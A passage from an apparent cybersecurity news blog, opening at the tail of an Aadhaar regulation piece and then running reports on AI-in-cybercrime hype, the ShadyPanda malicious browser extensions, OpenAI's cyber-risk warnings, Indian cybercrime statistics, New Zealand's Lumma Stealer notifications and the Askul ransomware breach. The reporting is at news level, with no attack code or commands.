Researchers from civil society organizations have highlighted earlier this year that anonymized Aadhaar-linked datasets are still at risk of re-identification and that the current data protection law does not regulate anonymized data sufficiently, resulting in a potential breakdown in the new controls when repurposing and processing them downstream. 

As a result of the amendments, Aadhaar's role within India's rapidly growing digital economy has been recalibrated, with greater usability balanced with tighter governance, as the amendments take into account a conscious effort to change the status of the system. Through formalizing offline verification, restricting the use of data through selective disclosure, and imposing clearer obligations on private actors, the revised regulations aim to curb informal practices that have long contributed to increased privacy and security risks. 

The success of these measures will depend, however, largely on the disciplined implementation of the measures, the continued oversight of the regulatory authorities, and the willingness of industry stakeholders to abandon legacy habits of indiscriminate data collection. There are many advantages to the transition for service providers. They can reduce compliance risks by implementing more efficient, privacy-preserving verification methods. 

Residents have a greater chance of controlling their personal data in everyday interactions with providers. As Aadhaar leaves its open access environments behind and moves deeper into private circumstances, continued transparency from UIDAI, regular audits of verification entities, and public awareness around consent and data rights will be critical in preserving trust in Aadhaar and in ensuring that convenience doesn't come at the expense of security.

There has been a lot of talk about how large-scale digital identity systems can evolve responsibly in an era where data protection expectations are higher than ever, so if the changes are implemented according to plan, they could serve as a blueprint for future evolution.
Read more »
Technology
AI tools Artificial Intelligence CyberCrime organizations Ransomware Technology

AI in Cybercrime: What’s Real, What’s Exaggerated, and What Actually Matters

 



Artificial intelligence is increasingly influencing the cyber security infrastructure, but recent claims about “AI-powered” cybercrime often exaggerate how advanced these threats currently are. While AI is changing how both defenders and attackers operate, evidence does not support the idea that cybercriminals are already running fully autonomous, self-directed AI attacks at scale.

For several years, AI has played a defining role in cyber security as organisations modernise their systems. Machine learning tools now assist with threat detection, log analysis, and response automation. At the same time, attackers are exploring how these technologies might support their activities. However, the capabilities of today’s AI tools are frequently overstated, creating a disconnect between public claims and operational reality.

Recent attention has been driven by two high-profile reports. One study suggested that artificial intelligence is involved in most ransomware incidents, a conclusion that was later challenged by multiple researchers due to methodological concerns. The report was subsequently withdrawn, reinforcing the importance of careful validation. Another claim emerged when an AI company reported that its model had been misused by state-linked actors to assist in an espionage operation targeting multiple organisations.

According to the company’s account, the AI tool supported tasks such as identifying system weaknesses and assisting with movement across networks. However, experts questioned these conclusions due to the absence of technical indicators and the use of common open-source tools that are already widely monitored. Several analysts described the activity as advanced automation rather than genuine artificial intelligence making independent decisions.

There are documented cases of attackers experimenting with AI in limited ways. Some ransomware has reportedly used local language models to generate scripts, and certain threat groups appear to rely on generative tools during development. These examples demonstrate experimentation, not a widespread shift in how cybercrime is conducted.

Well-established ransomware groups already operate mature development pipelines and rely heavily on experienced human operators. AI tools may help refine existing code, speed up reconnaissance, or improve phishing messages, but they are not replacing human planning or expertise. Malware generated directly by AI systems is often untested, unreliable, and lacks the refinement gained through real-world deployment.

Even in reported cases of AI misuse, limitations remain clear. Some models have been shown to fabricate progress or generate incorrect technical details, making continuous human supervision necessary. This undermines the idea of fully independent AI-driven attacks.

There are also operational risks for attackers. Campaigns that depend on commercial AI platforms can fail instantly if access is restricted. Open-source alternatives reduce this risk but require more resources and technical skill while offering weaker performance.

The UK’s National Cyber Security Centre has acknowledged that AI will accelerate certain attack techniques, particularly vulnerability research. However, fully autonomous cyberattacks remain speculative.

The real challenge is avoiding distraction. AI will influence cyber threats, but not in the dramatic way some headlines suggest. Security efforts should prioritise evidence-based risk, improved visibility, and responsible use of AI to strengthen defences rather than amplify fear.



Read more »
ShadyPanda campaign
Chrome Web Store malware Edge spyware extensions Koi Security report malicious browser extensions malware ShadyPanda campaign

Trusted Browser Extensions Turn Rogue in ShadyPanda Malware Campaign Affecting Chrome and Edge

 

Malicious browser extensions sometimes slip into official marketplaces like the Chrome Web Store by disguising themselves as genuine tools. Detecting them becomes even harder when they behave legitimately at first, only turning harmful after users have grown to trust them.

This tactic was recently uncovered on Google Chrome and Microsoft Edge. Researchers at Koi Security discovered several extensions on both platforms that functioned normally for years before being updated with malicious code. These updates enabled attackers to monitor user activity, collect sensitive information, and secretly send that data to external servers. The operation, dubbed ShadyPanda, amassed nearly four million downloads and continues to remain active on Edge.

Earlier this year, threat actors used a similar approach on Firefox. They first released harmless extensions designed to imitate popular cryptocurrency wallets. After gaining approval, downloads, and positive reviews, they later injected malicious functionality that logged user inputs in form fields, allowing attackers to access and steal crypto assets.

According to Koi Security, ShadyPanda originally began as an affiliate fraud scheme. Around 145 extensions posing as wallpaper and productivity tools were published across Chrome and Edge. In the initial phase, these add-ons inserted affiliate tracking codes and generated commission-based revenue through clicks to platforms like eBay, Amazon, and Booking.com. Over time, the campaign escalated to manipulating search results and eventually narrowed down to five extensions launched in 2018 that were later transformed into malware.

Some of these extensions gained significant credibility. They were labeled as Featured and Verified on Chrome, and one cache-cleaning tool called Clean Master achieved a 4.8-star rating from thousands of users. In 2024, updates to these extensions introduced malware capable of checking in hourly for commands, maintaining complete browser access, and transmitting user data back to ShadyPanda-controlled servers. These extensions have since been removed from Chrome.

In 2023, attackers also introduced five additional extensions to Microsoft Edge, including one called WeTab. Two of these functioned as full-scale spyware, and all remained active at the time of Koi Security’s report.

Because malicious extensions often masquerade as legitimate ones, simply scanning your installed add-ons may not reveal any obvious threats. Koi Security has published a list of extension IDs linked to the ShadyPanda campaign, which users should manually check.

On Chrome, users can enter chrome://extensions/ in the address bar, enable Developer mode, and view the IDs of installed extensions. These IDs can then be searched individually using the browser’s find function. If none match the listed malicious IDs, the browser is likely safe. If a match is found, the extension should be removed immediately. Edge users can follow the same steps via edge://extensions/.

This campaign highlights that even long-installed extensions can later be weaponized. Users should apply the same caution to browser add-ons as they do to mobile or desktop apps. Carefully review extension names, as fake ones often closely resemble legitimate tools. Watch for spelling errors, mismatched descriptions or images, and suspicious review patterns, such as an unusually high number of positive ratings in a short time. Conducting additional checks through online searches or community forums like Reddit can also help verify whether an extension is trustworthy.
Read more »
OpenAI
AI Model AI Models AI Systems ChatGPT ChatGPT. OpenAI Cyber Defenses Cyber Security cybersecurity risks OpenAI

OpenAI Warns Future AI Models Could Increase Cybersecurity Risks and Defenses

 

Meanwhile, OpenAI told the press that large language models will get to a level where future generations of these could pose a serious risk to cybersecurity. The company in its blog postingly admitted that powerful AI systems could eventually be used to craft sophisticated cyberattacks, such as developing previously unknown software vulnerabilities or aiding stealthy cyber-espionage operations against well-defended targets. Although this is still theoretical, OpenAI has underlined that the pace with which AI cyber-capability improvements are taking place demands proactive preparation. 

The same advances that could make future models attractive for malicious use, according to the company, also offer significant opportunities to strengthen cyber defense. OpenAI said such progress in reasoning, code analysis, and automation has the potential to significantly enhance security teams' ability to identify weaknesses in systems better, audit complex software systems, and remediate vulnerabilities more effectively. Instead of framing the issue as a threat alone, the company cast the issue as a dual-use challenge-one in which adequate management through safeguards and responsible deployment would be required. 

In the development of such advanced AI systems, OpenAI says it is investing heavily in defensive cybersecurity applications. This includes helping models improve particularly on tasks related to secure code review, vulnerability discovery, and patch validation. It also mentioned its effort on creating tooling supporting defenders in running critical workflows at scale, notably in environments where manual processes are slow or resource-intensive. 

OpenAI identified several technical strategies that it thinks are critical to the mitigation of cyber risk associated with increased capabilities of AI systems: stronger access controls to restrict who has access to sensitive features, hardened infrastructure to prevent abuse, outbound data controls to reduce the risk of information leakage, and continuous monitoring to detect anomalous behavior. These altogether are aimed at reducing the likelihood that advanced capabilities could be leveraged for harmful purposes. 

It also announced the forthcoming launch of a new program offering tiered access to additional cybersecurity-related AI capabilities. This is intended to ensure that researchers, enterprises, and security professionals working on legitimate defensive use cases have access to more advanced tooling while providing appropriate restrictions on higher-risk functionality. Specific timelines were not discussed by OpenAI, although it promised that more would be forthcoming very soon. 

Meanwhile, OpenAI also announced that it would create a Frontier Risk Council comprising renowned cybersecurity experts and industry practitioners. Its initial mandate will lie in assessing the cyber-related risks that come with frontier AI models. But this is expected to expand beyond this in the near future. Its members will be required to offer advice on the question of where the line should fall between developing capability responsibly and possible misuse. And its input would keep informing future safeguards and evaluation frameworks. 

OpenAI also emphasized that the risks of AI-enabled cyber misuse have no single-company or single-platform constraint. Any sophisticated model, across the industry, it said, may be misused if there are no proper controls. To that effect, OpenAI said it continues to collaborate with peers through initiatives such as the Frontier Model Forum, sharing threat modeling insights and best practices. 

By recognizing how AI capabilities could be weaponized and where the points of intervention may lie, the company believes, the industry will go a long way toward balancing innovation and security as AI systems continue to evolve.
Read more »
Ransomware
Cyber Crime CyberCrime Data Fraud India NCRB Ransomware

India Witnesses Sharp Surge in Cybercrime, Fraud Dominates NCRB 2023 Report

 

The cybercrime landscape in India has witnessed a drastic increase with NCRB data indicating cases jacking up from above 52,000 in 2021 to over 86,000 by 2023 led by fraud and online financial crime. Concurrently, threat intelligence shows that India is now a high‑risk ransomware and dark‑web ecosystem within the Asia‑Pacific region. 

NCRB data and growth trend 

The report suggests that NCRB’s “Crime in India” figures show an alarming and persistent increase in reported cybercrimes, increasing from just above 52,000 cases in 2021 to beyond 86,000 cases by 2023, owing to increased digitization, online payments and use of mobile internet. This is a 31.2% year-on-year increase between 2022 and 2023 alone and the country’s cybercrime rate has increased from 4.8 to 6.2 cases per lakh population. 

Fraud is the most prevalent motive, making up almost 69% of all cybercrime incidents in 2023, followed by sexual exploitation, and extortion, highlighting that attackers mainly prey on financial and personal vulnerabilities. States such as Karnataka, Telangana and Uttar Pradesh account for a large number of cases, reflecting higher IT penetration, urbanisation and digital adoption.

Ransomware and dark-web activity

Beyond the raw figures of the NCRB, the report places India among an Asia‑Pacific threat map of sorts, drawing upon the Cyble Monthly Threat Landscape Report for July 2025, to show that India is still among the key targets for operators of ransomware. It cited the Warlock ransomware group for targeting an India-based manufacturing firm, exfiltrating HR, financial, and design data, which was then used for extortion and exposure.

The report also notes dark‑web listings advertising unauthorized access to an Indian telecom network for around US$35,000, including credentials and critical operational details, highlighting the commoditization of network breaches. Regionally, Thailand, Japan, and Singapore each recorded six ransomware victims in the observed period, with India and the Philippines close behind, and manufacturing, government, and critical infrastructure sectors bearing the brunt of attacks. 

Additionally, South Asia is experiencing ideologically driven attacks, exemplified by the pro‑India Team Pelican Hackers, which claimed breaches of major Pakistani research and academic institutions. These campaigns blur the line between classic cybercrime and geopolitical conflict, indicating that Indian networks face both profit‑motivated and politically motivated breachs.
Read more »
Windows Security
Credential Theft Lumma Stealer malware malware infection National Cyber Security Centre New Zealand Cyber Security Online fraud Windows Security

Malicious Software Compromises 26000 Devices Across New Zealand


Thousands of devices have been infected with malware through New Zealand's National Cyber Security Center, showing the persistent risk posed by credential-stealing cybercrime, which has been causing New Zealand's National Cyber Security Center to notify individuals after an exposure. 

About 26,000 people have been notified by the agency that it is sending an email advising them to visit the Own Your Online portal for instructions on how to remove malicious software from their accounts and strengthen their account security. 

As NCSC Chief Operating Officer Michael Jagusch informed me, the alerts were related to Lumma Stealer, which is a highly regarded strain of malware targeting Windows-based devices. There is a danger that this malware can be used to facilitate identity theft or fraud by covertly harvesting sensitive data like email addresses and passwords. 

Officials noted that Lumma Stealer and other information-stealing tools are still part of an international cybercrime ecosystem that continues to grow, and so users should be vigilant and take proactive security measures in order to protect themselves. It has been reported that the National Cyber Security Centre of the Government Communications Security Bureau has conducted an assessment and found that it is possible that the malicious activity may have affected approximately 26,000 email addresses countrywide. 

As detailed in its statement published on Wednesday, the U.S. Department of Homeland Security has warned that the malware involved in the incident, dubbed Lumma Stealer, is specifically designed to be able to steal sensitive data, including login credentials and other personally identifiable information, from targeted systems.

As noted by the NCSC, this threat primarily targets Windows-based devices, and cybercriminals use this threat to facilitate the fraud of personal information and financial fraud. Thus, it highlights the continued exposure of everyday users to sophisticated campaigns aimed at stealing personal data. 

The issue was discovered by the National Cyber Security Centre's cyber intelligence partnerships, after the agency first worked with government bodies and financial institutions in order to alert a segment of those affected before expanding the effort to notify the entire public. Introducing the NCSC Chief Operating Officer, Michael Jagusch, he said the center has now moved to a broader direct-contact approach and this is its first time undertaking a public outreach of this sort on such a large scale. 

A step he pointed out was that the notifications are genuine and come from the official email address no-reply@comms.ncsc.govt.nz, which helps recipients distinguish between the legitimate and fraudulent ones. It is noteworthy that a recent BNZ survey indicates similar exposure across small and medium businesses, which is in line with the current campaign, which is targeted at households and individuals. 

The research reveals that 65% of small and medium-sized businesses believe scam activity targeting their businesses has increased over the past year; however, 45% of these businesses do not place a high priority on scam awareness or cyber education, despite the fact that their employees routinely handle emails, payment information and customer information. 

There were approximately half of surveyed SMEs who reported that they had been scammed in the last 12 months and many of them had been scammed by clicking links, opening attachments, or responding to misleading messages. According to BNZ fraud operations head Margaret Miller, criminals are increasingly exploiting human behavior as a means of committing fraud rather than exploiting technical flaws, targeting business owners and employees who are working on a daily basis. 

A substantial number of small business owners reported business financial losses following breaches, with 21% reporting business financial losses, 26% a personal financial loss and 30% experiencing data compromise, all of which had consequences beyond business accounts. According to Miller, the average loss was over $5,000, demonstrating that scammers do not only attempt to steal company funds, but also to steal personal information and sensitive business data in the form of financial fraud. 

It is the country's primary authority for helping individuals and companies reduce their cyber risk, and it is housed within the Government Communications Security Bureau.

The National Cyber Security Centre offers help to individuals and organisations and is a chief authority on cyber security. It has three core functions that form the basis of its work: helping New Zealanders make informed decisions about their digital security, ensuring strong cyber hygiene is embedded within essential services and in the wider cyber ecosystem in collaboration with key stakeholders, and using its statutory mandate to combat the most serious and harmful cyber threats through the deployment of its specialist capability. 

Own Your Online, a central part of this initiative, provides practical tools, guidance and resources designed to make cybersecurity accessible for householders, small businesses, and nonprofit organizations, as well as clear advice on prevention and what to do when an incident occurs. In particular, the NCSC owns the Own Your Online platform, which provides practical tools, guidance, and resources. 

There is no doubt that the incident serves as a timely reminder of the increasing sophistication and reach of modern cybercrime, as well as the shared responsibility that must be taken to limit its effects on society. Many experts continue to emphasize the importance of maintaining a safe system, including the use of strong, unique passwords, and the use of multi-factor authentication whenever possible. They advise maintaining your operating system and software up to date as well as using the proper passwords. 

Furthermore, users are advised to remain cautious of any unexpected emails or messages they receive, even if they appear to have come from trusted sources. Likewise, users should exclusively communicate through official channels to avoid any confusion. 

The focus continues to remain on raising awareness and improving resilience among individuals and organisations with the aim of improving digital awareness and improving collaboration between the authorities and the business and financial sector. 

A new approach has been adopted by agencies to encourage early detection, clear communication, and practical guidance that are aimed at reducing immediate harm while also fostering long-term confidence among New Zealanders in navigating an increasingly complex online world.
Read more »
Ransomware
Data Breach Data Theft eCommerce Japan MFA Ransomware

Askul Discloses Scope of Customer Data Theft Following October Ransomware Incident

 



Japanese e-commerce firm Askul Corporation has officially confirmed that a ransomware attack earlier this year led to the unauthorized access and theft of data belonging to nearly 740,000 individuals. The company made the disclosure after completing a detailed investigation into the cyber incident that occurred in October.

Askul operates a large-scale online platform that provides office supplies and logistics services to both corporate clients and individual consumers. The company is part of the Yahoo! Japan corporate group and plays a significant role in Japan’s business-to-business supply chain.

The cyberattack caused serious disruptions to Askul’s internal systems, resulting in an operational shutdown that forced the company to suspend product shipments. This disruption affected a wide range of customers, including major retail partners such as Muji.

Following the conclusion of its internal review, Askul clarified the categories of data that were compromised. According to the company, service-related records of approximately 590,000 business customers were accessed. Data connected to around 132,000 individual customers was also involved. In addition, information related to roughly 15,000 business partners, including outsourcing firms, agents, and suppliers, was exposed. The incident further affected personal data linked to about 2,700 executives and employees, including those from group companies.

Askul stated that it is deliberately limiting the disclosure of specific details related to the stolen data to reduce the risk of further exploitation. The company confirmed that affected customers and business partners will be informed directly through individual notifications.

Regulatory authorities have also been notified. Askul reported the data exposure to Japan’s Personal Information Protection Commission and has implemented long-term monitoring measures to identify and prevent any potential misuse of the compromised information.

System recovery remains ongoing. As of December 15, shipping operations had not fully returned to normal, and the company continues to work toward restoring all affected services.

Responsibility for the attack has been claimed by the ransomware group known as RansomHouse. The group publicly disclosed the breach at the end of October and later released portions of the stolen data in two separate leaks in November and December.

Askul shared limited technical findings regarding how the attackers gained access. The company believes the intrusion began through stolen login credentials associated with an administrator account belonging to an outsourced partner. This account did not have multi-factor authentication enabled, making it easier for attackers to exploit.

After entering the network, the attackers conducted internal reconnaissance, collected additional authentication information, and expanded their access to multiple servers. Askul reported that security defenses, including endpoint detection and response tools, were disabled during the attack. The company also noted that several ransomware variants were deployed, some of which bypassed existing detection mechanisms despite recent updates.

The attack resulted in both data encryption and widespread system failures. The ransomware was executed simultaneously across multiple servers, and backup files were deliberately erased to prevent rapid system recovery.

In response, Askul disconnected affected networks, restricted communication between data centers and logistics facilities, isolated compromised devices, and strengthened endpoint security controls. Multi-factor authentication has since been enforced across critical systems, and all administrator account passwords have been reset.

The financial consequences of the incident have not yet been determined. Askul has postponed its earnings report to allow additional time for a comprehensive assessment of the impact.



Read more »
Subscribe to: Comments (Atom)